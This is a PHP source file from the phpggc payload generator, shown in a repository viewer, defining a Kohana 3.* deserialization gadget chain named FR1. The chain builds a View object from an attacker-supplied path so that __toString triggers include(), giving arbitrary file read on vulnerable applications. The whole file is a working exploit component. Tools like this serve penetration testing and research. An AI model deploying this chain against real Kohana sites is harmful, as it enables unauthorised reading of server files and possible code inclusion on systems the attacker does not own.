Codebase list phpggc / 1e11ecb8-d039-471e-8ccf-a1d9c3335025/main gadgetchains / Kohana / FR / 1 / chain.php
1e11ecb8-d039-471e-8ccf-a1d9c3335025/main

Tree @1e11ecb8-d039-471e-8ccf-a1d9c3335025/main (Download .tar.gz)

chain.php @1e11ecb8-d039-471e-8ccf-a1d9c3335025/mainraw · history · blame

<?php

namespace GadgetChain\Kohana;

class FR1 extends \PHPGGC\GadgetChain\FileRead
{
    public static $version = '3.*';
    public static $vector = '__toString';
    public static $author = 'byq';
    public static $information = 'include()';

    public function generate(array $parameters)
    {
        return new \View($parameters['remote_path']);
    }
}